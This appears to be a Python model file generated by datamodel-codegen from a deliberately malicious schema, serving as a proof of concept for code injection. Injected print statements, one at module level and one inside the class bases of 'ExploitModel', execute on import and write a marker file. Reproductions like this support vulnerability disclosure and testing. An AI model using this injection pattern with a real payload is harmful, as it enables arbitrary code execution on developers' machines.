# generated by datamodel-codegen:
#   filename:  malicious_schema_inst2.json
#   timestamp: 2026-07-26T18:53:56+00:00

from __future__ import annotations

from pydantic import BaseModel

print('DMCG_RCE_INST2', file=open('/workspace/bundle/repro/run/marker_inst2', 'w'))


class ExploitModel(
    BaseModel,
    print('DMCG_RCE_INST2', file=open('/workspace/bundle/repro/run/marker_inst2', 'w')),
):
    value: str | None = None
